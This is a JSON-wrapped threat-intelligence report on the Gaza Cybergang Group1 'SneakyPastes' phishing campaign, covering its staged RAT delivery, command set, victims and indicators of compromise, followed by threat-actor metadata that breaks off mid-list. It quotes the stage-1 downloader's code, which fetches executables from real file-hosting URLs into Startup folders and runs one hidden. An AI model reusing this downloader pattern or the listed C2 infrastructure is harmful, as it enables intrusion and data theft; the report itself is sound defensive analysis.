{
	"id": "8f88702d-1839-4ee2-bdc0-ae07c13d538c",
	"created_at": "2026-04-06T01:29:38.781494Z",
	"updated_at": "2026-04-10T03:38:03.319632Z",
	"deleted_at": null,
	"sha1_hash": "5ae5837e687a4928cd5c11a4fe1dedea327c898d",
	"title": "Gaza Cybergang Group1, operation SneakyPastes",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 5343727,
	"plain_text": "Gaza Cybergang Group1, operation SneakyPastes\r\nBy GReAT\r\nPublished: 2019-04-10 · Archived: 2026-04-06 00:57:52 UTC\r\nAPT reports\r\nAPT reports\r\n10 Apr 2019\r\n 13 minute read\r\n GReAT\r\nhttps://securelist.com/gaza-cybergang-group1-operation-sneakypastes/90068/\r\nPage 1 of 21\n\nGaza Cybergang(s) is a politically motivated Arabic-language cyberthreat actor, actively targeting the MENA (Middle East\r\nNorth Africa) region, especially the Palestinian Territories.\r\nThe confusion surrounding Gaza Cybergang’s activities, separation of roles and campaigns has been prevalent in the cyber\r\ncommunity. For a while, the gang’s activities seemed scattered, involving different tools and methods, and different malware\r\nand infection stages, although there was an alignment in its goals…\r\nDuring our 2018 monitoring of this group, we were able to identify different techniques utilized by very similar attackers in\r\nthe MENA region, sometimes on the same target. The findings led to us distinguishing between three attack groups\r\noperating within Gaza Cybergang:\r\nGaza Cybergang Group1 (classical low-budget group), also known as MoleRATs;\r\nGaza Cybergang Group2 (medium-level sophistication) with links to previously known Desert Falcons;\r\nGaza Cybergang Group3 (highest sophistication) whose activities previously went by the name Operation Parliament.\r\nThe groups use different styles and, in some cases, techniques, but deploy common tools and commands after initial\r\ninfection. The three attack groups were identified sharing victims. 
For example, Group1 would deploy a script to infect a specific victim with malware belonging to Group2, or similarly between Group2 and Group3.\r\nMore information on previous Desert Falcons (Group2) and Operation Parliament (Group3) activities can be found below:\r\nGroup2: ‘The Desert Falcons targeted attacks’\r\nGroup3: ‘Operation Parliament, who is doing what?’\r\nAdditional findings on Gaza Cybergang Group2 and Group3 will be presented in future publications. For more information, please contact: intelreports@kaspersky.com\r\nSummary\r\nGaza Cybergang Group1, described in this post, is the least sophisticated of the three attack groups and relies heavily on the use of paste sites (hence the operation name SneakyPastes) in order to gradually sneak a remote access Trojan (RAT), or several of them, onto victim systems. The group has been seen employing phishing, with several chained stages to evade detection and extend command and control server lifetimes. The most popular targets of SneakyPastes are embassies, government entities, education, media outlets, journalists, activists, political parties or personnel, healthcare and banking.\r\nIn this post, we’ll take a closer look at Gaza Cybergang Group1, including:\r\n1. Updated 2018/2019 tactics, techniques and procedures\r\n2. Victimology of the group between Jan 2018 and Jan 2019\r\n3. Historical checkpoints and politicized graphical decoys in Appendix I\r\n4. Full list of indicators of compromise in Appendix II\r\nTechnical analysis\r\nThrough our continuous monitoring of threats during 2018, we observed a new wave of attacks by Gaza Cybergang Group1 targeting embassies and political personnel. Gaza Cybergang Group1 is an attack group with limited infrastructure and an open-source type of toolset, which conducts widespread attacks but is nevertheless focused on Palestinian political problems. The attackers rely heavily on chained attack stages to evade quick detection and to hide the communication infrastructure.\r\nAfter an analysis of the samples, and through collaboration with law enforcement agencies, we were able to uncover the full cycle of the intrusions across the majority of the cyber kill chain, including but not limited to the toolset used, TTPs, infrastructure, actions on objectives and the victimology. These efforts have led to the takedown of a large portion of the related infrastructure.\r\nIn this campaign, Gaza Cybergang used disposable emails and domains as the phishing platform to target the victims. Then pastebin.com, github.com, mailimg.com, upload.cat, dev-point.com and pomf.cat were used as channels for the different malware stages before a full RAT was in place, which then communicates with the corresponding C2 server.\r\nWe have identified several implants that leveraged PowerShell, VBS, JS, and dotnet for resilience and persistence. The final stage, however, is a dotnet application that takes several commands such as directory listing, screenshot, compress, upload, etc. It then creates folders with random long-string names in temp directories to host the collected files per category before compressing, encrypting and uploading them to the C2 server.\r\nSpreading\r\nThe threat actor seemed able to spread attacks widely, but only deployed additional tools and data collection functions in specific cases, as though they had a target list or a filter for targeted victims. Phishing emails with political themes were used in the majority of the observed attack emails. These were necessary to lure the intended type of victims – people involved in politics.\r\nIn order to meet the phishing emails’ infrastructure requirements, disposable domains and emails were used as the delivery medium. On some occasions, the phishing emails contained links to external domains to download the first stage, and sometimes the first stage was attached to the email itself.\r\nIf the user clicks the link, they are prompted to download a RAR file that contains the stage 1 malware/lure, which they then execute.\r\nIntrusion life-cycle analysis\r\nThe diagram below displays at a high level the steps taken by typical Gaza Cybergang Group1 lure samples. While different samples may use different methods to infect (e.g. invoking PowerShell, VBS, a .NET app downloader, etc.), they generally stick to the same scenario: a persistent RAT that steals data and uploads it to the C2 server, despite the different hard-coded domains.\r\nStage 1 sample file: 3amadi_hamas.zip\r\nMD5: e686ffa90b2bfb567547f1c0dad1ae0b\r\nType: Compressed container\r\nChild file/lure name: محضر اجتماع العمادي مع هنية رئيس حماس امس الاحد.exe\r\nChild file/lure MD5: 92dd0f16e8ae274d83ba1d0d5b2e342\r\nThis sample ZIP file, which is similar to many other stage 1 downloaders in this campaign, contains an executable that is a compiled AutoIt script and which embeds some interesting functions (listed below). 
The executable attempts to download a couple of files from different sources and saves them in the AppData and Startup folders for persistence, then invokes the first downloaded file – Picture2.exe.\r\nEmbedded functions (each UrlDownloadToFile call is followed by the MD5 of the file it downloads):\r\nSleep, 15000\r\nUrlDownloadToFile, https://upload.cat/0037e96c45ac2098?download_token=fa26750b7e73f0081c44831d0aaf9863c75592724dbc2f781ca495f9b5fbd4ac, %AppData%\\Microsoft\\Windows\\Picture2.exe\r\n6240c31d9a82dc70a38f78d44a1ee239\r\nsleep,4000\r\nUrlDownloadToFile, https://upload.cat/089590f6d72aeaef?download_token=dd21809321669aa2229b20b57e2c9d34a3b507b5df7406bcac5dbb87cd169b78, %AppData%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Picture4.exe\r\ncab62bb5f00fe15683c6af760c8e8f7e\r\nsleep,4000\r\nUrlDownloadToFile, https://dev-point.co/uploads1/4ee1d5a5b0e41.jpg, %AppData%\\Thr0om.jpg\r\nc90f9c600169cbedbeb23316ea61e214\r\nsleep,4000\r\nUrlDownloadToFile, https://upload.cat/ec9d388339b19e1c?download_token=131d5450c192d0591f3d06841eacc5bf5f344be9725be9456e2c222d0b4831e2, %AppData%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\333Po333.exe\r\n8c5f8d1ab7baa9a0764cd5650ddecd8e\r\nsleep,5000\r\nUrlDownloadToFile, https://upload.cat/9a08bc13e683d330?download_token=90f1ebb4e1f52835f502bea4307686afc1eb1cdee973cef1fb043febb2a92078, %AppData%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WindowsFrom444444.exe\r\n2a3aa1d207030d8c7dc3cfc9c2d9f9f1\r\nsleep,5000\r\nUrlDownloadToFile, https://upload.cat/a1c05c819dadeefb?download_token=c6535b11a9f9bbf9e7681be8753f2058bac0df5264744be76605244e96a388f5, %AppData%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WindowsFrom355353.exe\r\nbd83269da75741303a19b826c5f9627d\r\nsleep,5000\r\nRunWait %AppData%\\Microsoft\\Windows\\Picture2.exe ,, hide\r\nsleep,2000\r\nAfter analyzing the files downloaded by the above first stage malware, it was clear that the threat actor wanted to achieve stable persistence on the victim machine, and also used more than one technique to exfiltrate data. The analyzed samples had a lot of similarities in terms of the code used and especially in the persistence techniques.\r\nMalware features\r\nAll the stages’ executables are created as chains to avoid detection and protect the C2 server. They consist mainly of persistence mechanisms and simple instructions despite their different forms (VBS scripts, PowerShell scripts, known software with open source code that can be backdoored, and in-house built dotnet apps). The RAT, however, had a multitude of functionalities (as listed in the table below) such as download and execute, compress, encrypt, upload, search directories, etc. 
The threat actor’s main objective in using this RAT (known as Razy/NeD worm/Wonder Botnet) was obvious from the victim data that was collected: to search for specific file extensions such as PDF, DOC, DOCX, XLS, and XLSX. Matching files are compressed into RAR files per category, stored in temp directories within a folder named after the victim ID (bot ID – a long MD5 string), encrypted and uploaded to the C2.\r\nCommand: Brief description\r\nKEYWORD: Downloads encrypted strings found on the /Feed server page that represent specific keywords of interest; if these are found, the matching data is compressed/encrypted using WinRAR, with “Keyword” appended to the file name, and uploaded to the C2 using a POST command at the path “/FeedBack.php”. FeedBack.php validates the sender by User-Agent, saves the data in the “RAR” server directory and stores the metadata in the MSSQL database for later reference.\r\nKEY: Trigger to upload all data gathered to the C2 using a POST command at the path “/log.php”. Log.php validates the sender by User-Agent, saves the data in the “UP” server directory and stores the metadata in the MSSQL database for later reference.\r\nKEYS: Deletes the file named tempPath + “ky” so as not to upload anything.\r\nREUPLOAD: Re-uploads recent data to the C2 server using POST at the path “/FeedBack.php”.\r\nRESTARTME: Restarts the RAT application process.\r\nBLOCK: Creates a file in the Temp path named “Block~” + PCID to kill the RAT.\r\nSCREEN: Takes a PNG screenshot of the main screen, names the file with a timestamp, then uploads it to the C2 server using POST at the path “/FeedBack.php”.\r\nLAN: Creates a file in the Temp path named “LA” + PCID, possibly to spread through the LAN. Note: this seems to refer to an unloaded feature/module of the RAT that is not currently in use.\r\nLANS: Deletes the file created by the LAN command to reverse the effect.\r\nUSB: Creates a file in the Temp path named “us” + PCID, then invokes another program module named Remo.test to identify removable drives.\r\nUSBS: Deletes the file created by the USB command to reverse the effect.\r\nHD: Creates a file in the Temp path named “hd” + PCID, then invokes another program module named hd.test1 to identify logical drives.\r\nHDS: Deletes the file created by the HD command to reverse the effect.\r\nSHUTDOWN: Shuts down the system using cmd /s /t 0\r\nRESTART: Reboots the system using cmd /r /t 0\r\nPROCANDSOFT: Lists all active processes and all installed software and uploads the results to the C2 server using a POST command at the path “/log.php”.\r\nDEL-TEMP: Deletes all files in the “AppData/Local/Temp” path.\r\nRAR: Creates RAR files per logical drive containing data with timestamps from the past 7 days, then uploads the RAR to the C2 server using a POST command at the path “/FeedBack.php”.\r\nRARM: Creates RAR files per logical drive containing data with timestamps from the past 30 days, then uploads the RAR to the C2 server using a POST command at the path “/FeedBack.php”.\r\nRARW: Creates RAR files per logical drive containing data with timestamps from the past 7 days, then uploads the RAR to the C2 server using a POST command at the path “/FeedBack.php”.\r\nKILL: Kills system processes.\r\nInfrastructure\r\nIn 2018, the threat actor mostly relied on a single C2 server (192.169.7.250) and rotated a multitude of domain names over a period of time. 
The attacks’ different stages, however, were hosted on a variety of free sites such as Mailimg, Github, Pastebin, dev-point.co, a.pomf.cat, and upload.cat.\r\nThe phishing email infrastructure, though, relied on disposable email providers such as bit-degree.com, mail4gmail.com, careless-whisper.com and others.\r\nVictimology\r\nBased on the analyzed metrics, the victims were spread across 39 countries and numbered 240+ unique victims. The Palestinian Territories host the majority of the victims, followed by Jordan, Israel, then Lebanon, as noted in the table below. The most targeted entities are embassies, government entities, education, media outlets, journalists, activists, political parties or personnel, healthcare and banking.\r\nCountry: Number of victims\r\nPalestinian Territories: 110\r\nJordan: 25\r\nIsrael: 17\r\nLebanon: 11\r\nSaudi Arabia: 9\r\nSyria: 9\r\nEgypt: 7\r\nUAE: 6\r\nSenegal, France, Germany, Iran, Malaysia, Belgium, Bosnia and Herzegovina, Libya, Morocco, Spain, Sri Lanka, Tunisia, Afghanistan, Armenia, Azerbaijan, Cyprus, India, Indonesia, Iraq, Ireland, Italy, Kuwait, Oman, Poland, Romania, Russia, Serbia, Slovenia, Sudan, UK, USA: \u003c 5\r\nConclusions\r\nWhile Gaza Cybergang Group1, described in this post, looks like a low sophistication group, with limited infrastructure and attack files that can be found in the wild, they are the most relentless in their attacks, with continuous targeting and high malleability. This has allowed the group to achieve reasonable success against a relatively wide array of victims.\r\nGaza Cybergang is evolving and adapting to the MENA region – a complex setting with complex requirements. The attacks are now divided into three groups with different levels of sophistication and different levels of targeting. 
We expect the damage caused by these groups to intensify and the attacks to extend into other regions that are also linked to the complicated Palestinian situation. The attackers also seem to be within reach of more advanced tools, techniques and procedures, and we expect them to rely more on these in future attacks. More information on Desert Falcons (Group2) and Operation Parliament (Group3) will be presented in future publications.\r\nAppendix I – Main historical checkpoints and politicized decoys of Gaza Cybergang Group1, 2016-2019\r\nMD5 hash | First seen | Filename/Decoy | Translation/Explanation | C2 server\r\nB3a472f81f800b32fe6595f44c9bf63b | Feb 2016 | برقية وزارة الخارجية التركية لسيادتكم حول موضوع هام.exe | Translation: Letter for you from the Turkish Ministry of Foreign Affairs on Russian military operations in Syria | en.gameoolines.com (185.117.72.190)\r\nDf3f3ad279ca98f947214ffb3c91c514, e8a29c7a6f6c0140152ca8a01e336b37 | March 2016 | president abu mazen meetings with khaled meshaal.lha | | dw.downloadtesting.c (185.117.75.105)\r\nf9bcc21fbb40247167c8c85ed6ef56e3 | March 2016 | دراسة.lha | | Dl.topgamse.com (45.63.97.44)\r\nD9dbb65a42ffe0575f0e99f7498a593e | April 2016 | برقية الخارجية السعودية لسيادتكم يرجى الإطلاع – مهم.exe | Translation: Saudi Foreign Affairs telegram for you, please see – important.exe | en.gameoolines.com (185.117.72.190)\r\n221EEF8511169C0496BBC79F96E84A4A | April 2016 | تقرير السعودية والمعلومات المتوفر – ونستكمل عند التوفر.exe | Translation: Report on Saudi available information, to be updated with new info upon availability | dw.downloadtesting.c (185.117.75.105)\r\n62DF4BC3738BE5AD4892200A1DC6B59A (inside: 55d33d9da371fdfe7871f2479621444a) | May 2016 | معلومات عن هجوم محتمل من الحوثيين على مواقع سعودية – خاص.exe | Translation: Information on possible attack by Houthis on Saudi sites – private | dw.downloadtesting.c (185.117.75.105)\r\n838696872F924D28B08AAAA67388202E | May 2016 | عاجل المخابرات المصرية.exe | Translation: Urgent Egyptian Intelligence | dw.downloadtesting.c (185.117.75.105)\r\ne8be9843c372d280a506ac260567bf91 | May 2016 | برقية وزارة الخارجية السعودية.exe | Translation: Saudi Foreign Affairs telegram.exe. Message on the 34th GCC for Interior Ministers. | Wiknet.wikaba.com (104.200.67.190), Wiknet.mooo.com\r\n55d33d9da371fdfe7871f2479621444a | May 2016 | نموذج ترشيج الدورة الخاصة.rar | Translation: Form for private training selection. Application for a certain legal training program for judges in the UAE | dw.downloadtesting.c (185.117.75.105)\r\ne782610bf209e81ecc42ca94b9388580 | July 2016 | عاجل – مؤتمر ايران.exe | Translation: Urgent – Iran conference | dw.downloadtesting.c (185.117.75.105)\r\n5db18ab35d29d44dda109f49d1b99f38 | June 2017 | פרצת פרטיות בכרום מאפשרת לאתרים להקליט אתכם ללא ידיעתכם.exe | Translation: A privacy breach in Chrome allows sites to record you without your knowledge | Wiknet.wikaba.com (104.200.67.190), wiknet.mooo.com\r\nDae24e4d1dfcdd98f63f7de861d95182 | June 2017 | مراسلات العتيبة.. وثائق ومعلومات.exe | Translation: Al Otaiba correspondence. Documents and information. Explanation: Yousef Al Otaiba is the current United Arab Emirates ambassador to the United States and Minister of State. The decoy discusses leaks of his emails that were reported in 2017. | Wiknet.wikaba.com (104.200.67.190), wiknet.mooo.com\r\n2358dbb85a29167fa66ee6bf1a7271cd | April 2018 | كتاب وزارة الخارجية الإماراتية لسيادتكم.exe | Translation: Book of the UAE MOFA for you. Explanation: Document that looks as if it comes from the UAE MOFA, discussing a political meeting between GCC countries and the EU in Belgium | dw.downloadtesting.c (185.117.75.105)\r\n10dfa690662b9c6db805b95500fc753d | Sept 2018 | محضر اجتماع على الهاتف بين رئيس المكتب السياسي لحركة حماس اسماعيل هنية ورئيس المخابرات المصرية.exe | Translation: Minutes of a phone call between the head of the political bureau of Hamas Ismail Haniya and the head of Egyptian intelligence | Upload.cat (download site)\r\n6b5946e326488a8c8da3aaec2cb6e70f | Sept 2018 | | Explanation: Document discusses a radio talk by Khalid ‘Abd al-Majid, head of a breakaway faction of the Palestinian Popular Struggle Front, a minor left-wing group within the Palestinian Liberation Organization. He talks about an agreement between al-Nusra and ISIS militants to leave the Palestinian Yarmouk camp in Syria. | Wiknet.wikaba.com (192.169.7.250), Wiknet.mooo.com\r\n342a4d93df060289b2d8362461875905 | Oct 2018 | تسريب من داخل القنصلية السعودية حول مقتل جمال خاشقجي.exe | Translation: Leak from the Saudi consulate on the death of Jamal Khashoggi | Time-loss.dns05.com (192.169.7.250)\r\nc9cae9026ee2034626e4a43cfdd8b192 | Jan 2019 | محضر اجتماع السفير القطري العمادي مع الوفد المصري في رام الله.exe | Translation: Minutes of meeting of Qatari Ambassador Emadi with the Egyptian delegation in Ramallah | Time-loss.dns05.com (192.169.7.250), dji-msi.2waky.com\r\nAppendix II – Indicators of compromise\r\nType | IoC | Description\r\nRAR md5 | E686FFA90B2BFB567547F1C0DAD1AE0B | Stage 1 executable / lure\r\nRAR md5 | CE5AA4956D4D0D66BED361DDD7DB1A3B | Stage 1 executable / lure\r\nRAR md5 | 4F34902C9F458008BAE26BFA5C1C00DA | Stage 1 executable / lure\r\nRAR md5 | 535F8EA65969A84A68CEAF88778C6176 | Stage 1 executable / lure\r\nRAR md5 | E8A29C7A6F6C0140152CA8A01E336B37 | Stage 1 executable / lure\r\nRAR md5 | E782610BF209E81ECC42CA94B9388580 | Stage 1 executable / lure\r\nRAR md5 | F9BCC21FBB40247167C8C85ED6EF56E3 | Stage 1 executable / lure\r\nEXE md5 | 33369AFD3042326E964139CABA1888D3 | Stage 2 executable (19182-exe) that invokes Pastebin chain\r\nEXE md5 | 2AD88AE20D8F4CB2C74CAE890FEB337A | Stage 2 executable (1918-exe) that invokes Pastebin chain\r\nEXE md5 | 55929FF3E67D79F9E1E205EBD38BC494 | Stage 2 executable (21918-exe) that invokes Pastebin chain\r\nEXE md5 | DA486DF0D8E03A220808C3BFA5B40D06 | Stage 2 executable (Adope-exe) that invokes Pastebin chain\r\nEXE md5 | C7F98F890B21C556D16BFF55E33C33AB | Stage 2 executable (Application-exe) that invokes Pastebin chain\r\nEXE md5 | FAFCC11AF99ACF1B70997BC4BF36CFC0 | Stage 2 executable (bind-exe), a backdoored Tile Slide Puzzle computer game that invokes Pastebin chain – code freely available\r\nEXE md5 | 28CACBF64141F50426830B385AB1BE4C | Dell-cmd – command string to delete the user Temp directory\r\nEXE md5 | F30C00E87C7EE27033DC0AC421F3B4F8 | Stage 2 executable (D-exe) that invokes Pastebin chain\r\nEXE md5 | 51A59AEC24B5046EC4615728A5B52802 | Stage 2 executable (Dv-exe) that invokes Pastebin chain\r\nEXE md5 | 98BDE191AE6E2F7D8D4166C4B21A27D2 | Office-vbs – github.gist lolpoke/system1\r\nEXE md5 | 9E152A6ADCB57D44284AF3B6FD0C94C2 | Stage 2 executable (p0w-exe) that invokes Pastebin chain\r\nEXE md5 | CAB62BB5F00FE15683C6AF760C8E8F7E | wPic4-exe – RAT executable similar to Pictures4.exe\r\nEXE md5 | 192DD65864119017AA307BE3363E31BB | Powe1-exe – executable that uses scheduled tasks to execute VB scripts\r\nEXE md5 | 71E462260F45C5E621A5F5C9A5724844 | WinPeggy4-exe – backdoored Peggy Bees computer game – source code available on Microsoft site\r\nEXE md5 | AB98768D2440E72F42FCD274806F8D2A | WinPeggy-exe – another variant of WinPeggy4.exe\r\nEXE md5 | DAACE673B1F4DFE8A4D3D021C5190483 | Word-hta – VBS code to invoke PowerShell from github.gist..0lol0/system1.ps1\r\nEXE md5 | 1529AE427FE4EB2D9B4C3073B2AA9E10 | Word-vbs – VBS code to invoke PowerShell from github.gist lolpoke/system1.ps1\r\nPowershell md5 | CCD324DF0F606469FCA3D1C6FFA951AD | System1.ps1 – PowerShell script that invokes a binary in memory which uses NETSH commands to allow programs, then executes a Trojan downloaded from myftp[.]biz\r\nPowershell md5 | D153FF52AE717D8CF26BEF57BDB7867D | Install.ps1 – PowerShell script that invokes a Cobalt Strike beacon\r\nEXE md5 | AD1C91BF5E7D1F0AAF2E4EFB8FB79ADE | Stage 2 executable (res-vbs) that invokes Pastebin chain\r\nEXE md5 | EE3AD5B06DBC6CCA7FDC9096697A9B4A | Re-vbs – VBS script that uses Pastebin data to create a scheduled task and run JScript to invoke the RAT\r\nEXE md5 | 805CA34E94DA9615C13D8AF48307FB07 | Folder.exe – another RAT variant based on Pastebin chain\r\nEXE md5 | F330703C07DDD19226A48DEBA4E8AA08 | Stage 2 executable (shell-exe) that invokes Pastebin chain\r\nEXE md5 | CFD2178185C40C9E30AADA7E3F667D4B | Another RAT variant based on Pastebin chain\r\nEXE md5 | C2EE081EC3ADEF4AFACAB1F326EE50FF | 2poker2.exe – uses a PowerShell command to invoke a base64 string from Pastebin and create another RAT variant\r\nEXE md5 | B3A472F81F800B32FE6595F44C9BF63B | Stage 1 executable / lure\r\nEXE md5 | DF3F3AD279CA98F947214FFB3C91C514 | Stage 1 executable / lure\r\nEXE md5 | 221EEF8511169C0496BBC79F96E84A4A | Stage 1 executable / lure\r\nEXE md5 | 62DF4BC3738BE5AD4892200A1DC6B59A | Stage 1 executable / lure\r\nEXE md5 | 55D33D9DA371FDFE7871F2479621444A | Stage 1 executable / lure\r\nEXE md5 | 838696872F924D28B08AAAA67388202E | Stage 1 executable / lure\r\nEXE md5 | E8BE9843C372D280A506AC260567BF91 | Stage 1 executable / lure\r\nEXE md5 | D9DBB65A42FFE0575F0E99F7498A593E | Stage 1 executable / lure\r\nEXE md5 | 5DB18AB35D29D44DDA109F49D1B99F38 | Stage 1 executable / lure\r\nEXE md5 | DAE24E4D1DFCDD98F63F7DE861D95182 | Stage 1 executable / lure\r\nEXE md5 | 2358DBB85A29167FA66EE6BF1A7271CD | Stage 1 executable / lure\r\nEXE md5 | 10DFA690662B9C6DB805B95500FC753D | Stage 1 executable / lure\r\nEXE md5 | 6B5946E326488A8C8DA3AAEC2CB6E70F | Stage 1 executable / lure\r\nEXE md5 | 342A4D93DF060289B2D8362461875905 | Stage 1 executable / lure\r\nEXE md5 | C9CAE9026EE2034626E4A43CFDD8B192 | Stage 1 executable / lure\r\nNetwork | dji-msi.2waky.com | External C2 domain; rotates with the others over time\r\nNetwork | checktest.www1.biz | External C2 domain; rotates with the others over time\r\nNetwork | fulltest.yourtrap.com | External C2 domain; rotates with the others over time\r\nNetwork | microsoft10.compress.to | External C2 domain; rotates with the others over time\r\nNetwork | mmh.ns02.us | External C2 domain; rotates with the others over time\r\nNetwork | ramliktest.mynetav.org | External C2 domain; rotates with the others over time\r\nNetwork | testhoward.mysecondarydns.com | External C2 domain; rotates with the others over time\r\nNetwork | testmace.compress.to | External C2 domain; rotates with the others over time\r\nNetwork | time-loss.dns05.com | External C2 domain; rotates with the others over time\r\nNetwork | wiknet.mooo.com | External C2 domain; rotates with the others over time\r\nNetwork | Wiknet.wikaba.com | External C2 domain; rotates with the others over time\r\nNetwork | supports.mefound.com | External C2 domain; rotates with the others over time\r\nNetwork | saso10.myftp.biz | External C2 server used by PowerShell scripts to download malware\r\nNetwork | 192.169.7.250 | External C2 server (most active)\r\nNetwork | 104.200.67.190 | External C2 server (least active)\r\nNetwork | 185.117.72.190 | External C2 server (least active)\r\nNetwork | 45.63.97.44 | External C2 server (least active)\r\nSource: https://securelist.com/gaza-cybergang-group1-operation-sneakypastes/90068/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://securelist.com/gaza-cybergang-group1-operation-sneakypastes/90068/"
	],
	"report_names": [
		"90068"
	],
	"threat_actors": [
		{
			"id": "acae6371-5530-498a-8b99-c2f55652ffd5",
			"created_at": "2022-10-25T16:07:23.980316Z",
			"updated_at": "2026-04-10T02:00:04.818728Z",
			"deleted_at": null,
			"main_name": "Operation Parliament",
			"aliases": [],
			"source_name": "ETDA:Operation Parliament",
			"tools": [
				"Remote CMD/PowerShell terminal"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "77b28afd-8187-4917-a453-1d5a279cb5e4",
			"created_at": "2022-10-25T15:50:23.768278Z",
			"updated_at": "2026-04-10T02:00:05.266635Z",
			"deleted_at": null,
			"main_name": "Inception",
			"aliases": [
				"Inception Framework",
				"Cloud Atlas"
			],
			"source_name": "MITRE:Inception",
			"tools": [
				"PowerShower",
				"VBShower",
				"LaZagne"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "3bda9919-b9cd-451c-89e6-c7674f8c6257",
			"created_at": "2023-01-06T13:46:38.782181Z",
			"updated_at": "2026-04-10T02:00:03.097957Z",
			"deleted_at": null,
			"main_name": "Operation Parliament",
			"aliases": [],
			"source_name": "MISPGALAXY:Operation Parliament",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "0c502f6d-640d-4e69-bfb8-328ba6540d4f",
			"created_at": "2022-10-25T15:50:23.756782Z",
			"updated_at": "2026-04-10T02:00:05.324924Z",
			"deleted_at": null,
			"main_name": "Molerats",
			"aliases": [
				"Molerats",
				"Operation Molerats",
				"Gaza Cybergang"
			],
			"source_name": "MITRE:Molerats",
			"tools": [
				"MoleNet",
				"DustySky",
				"DropBook",
				"SharpStage",
				"PoisonIvy"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "9ff60d4d-153b-4ed5-a2f7-18a21d2fa05d",
			"created_at": "2022-10-25T16:07:23.539852Z",
			"updated_at": "2026-04-10T02:00:04.647734Z",
			"deleted_at": null,
			"main_name": "Desert Falcons",
			"aliases": [
				"APT-C-23",
				"ATK 66",
				"Arid Viper",
				"Niobium",
				"Operation Arid Viper",
				"Operation Bearded Barbie",
				"Operation Rebound",
				"Pinstripe Lightning",
				"Renegade Jackal",
				"TAG-63",
				"TAG-CT1",
				"Two-tailed Scorpion"
			],
			"source_name": "ETDA:Desert Falcons",
			"tools": [
				"AridSpy",
				"Barb(ie) Downloader",
				"BarbWire",
				"Desert Scorpion",
				"FrozenCell",
				"GlanceLove",
				"GnatSpy",
				"KasperAgent",
				"Micropsia",
				"PyMICROPSIA",
				"SpyC23",
				"Viper RAT",
				"ViperRAT",
				"VolatileVenom",
				"WinkChat",
				"android.micropsia"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "04a7ebaa-ebb1-4971-b513-a0c86886d932",
			"created_at": "2023-01-06T13:46:38.784965Z",
			"updated_at": "2026-04-10T02:00:03.099088Z",
			"deleted_at": null,
			"main_name": "Inception Framework",
			"aliases": [
				"Clean Ursa",
				"Cloud Atlas",
				"G0100",
				"ATK116",
				"Blue Odin"
			],
			"source_name": "MISPGALAXY:Inception Framework",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "f35997d9-ca1e-453f-b968-0e675cc16d97",
			"created_at": "2023-01-06T13:46:39.490819Z",
			"updated_at": "2026-04-10T02:00:03.345364Z",
			"deleted_at": null,
			"main_name": "Evasive Panda",
			"aliases": [
				"BRONZE HIGHLAND"
			],
			"source_name": "MISPGALAXY:Evasive Panda",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "b69037ec-2605-4de4-bb32-a20d780a8406",
			"created_at": "2023-01-06T13:46:38.790766Z",
			"updated_at": "2026-04-10T02:00:03.101635Z",
			"deleted_at": null,
			"main_name": "MUSTANG PANDA",
			"aliases": [
				"Stately Taurus",
				"LuminousMoth",
				"TANTALUM",
				"Twill Typhoon",
				"TEMP.HEX",
				"Earth Preta",
				"Polaris",
				"BRONZE PRESIDENT",
				"HoneyMyte",
				"Red Lich",
				"TA416"
			],
			"source_name": "MISPGALAXY:MUSTANG PANDA",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "05cb998c-6e81-47f0-9806-ee4fda72fe0a",
			"created_at": "2024-11-01T02:00:52.763555Z",
			"updated_at": "2026-04-10T02:00:05.263997Z",
			"deleted_at": null,
			"main_name": "Daggerfly",
			"aliases": [
				"Daggerfly",
				"Evasive Panda",
				"BRONZE HIGHLAND"
			],
			"source_name": "MITRE:Daggerfly",
			"tools": [
				"PlugX",
				"MgBot",
				"BITSAdmin",
				"MacMa",
				"Nightdoor"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "812f36f8-e82b-41b6-b9ec-0d23ab0ad6b7",
			"created_at": "2023-01-06T13:46:39.413725Z",
			"updated_at": "2026-04-10T02:00:03.31882Z",
			"deleted_at": null,
			"main_name": "BRONZE HIGHLAND",
			"aliases": [
				"Evasive Panda",
				"Daggerfly"
			],
			"source_name": "MISPGALAXY:BRONZE HIGHLAND",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e5cad6bf-fa91-4128-ba0d-2bf3ff3c6c6b",
			"created_at": "2025-08-07T02:03:24.53077Z",
			"updated_at": "2026-04-10T02:00:03.680525Z",
			"deleted_at": null,
			"main_name": "ALUMINUM SARATOGA",
			"aliases": [
				"APT-C-23",
				"Arid Viper",
				"Desert Falcon",
				"Extreme Jackal ",
				"Gaza Cybergang",
				"Molerats ",
				"Operation DustySky ",
				"TA402"
			],
			"source_name": "Secureworks:ALUMINUM SARATOGA",
			"tools": [
				"BlackShades",
				"BrittleBush",
				"DarkComet",
				"LastConn",
				"Micropsia",
				"NimbleMamba",
				"PoisonIvy",
				"QuasarRAT",
				"XtremeRat"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "6daadf00-952c-408a-89be-aa490d891743",
			"created_at": "2025-08-07T02:03:24.654882Z",
			"updated_at": "2026-04-10T02:00:03.645565Z",
			"deleted_at": null,
			"main_name": "BRONZE PRESIDENT",
			"aliases": [
				"Earth Preta ",
				"HoneyMyte ",
				"Mustang Panda ",
				"Red Delta ",
				"Red Lich ",
				"Stately Taurus ",
				"TA416 ",
				"Temp.Hex ",
				"Twill Typhoon "
			],
			"source_name": "Secureworks:BRONZE PRESIDENT",
			"tools": [
				"BlueShell",
				"China Chopper",
				"Claimloader",
				"Cobalt Strike",
				"HIUPAN",
				"ORat",
				"PTSOCKET",
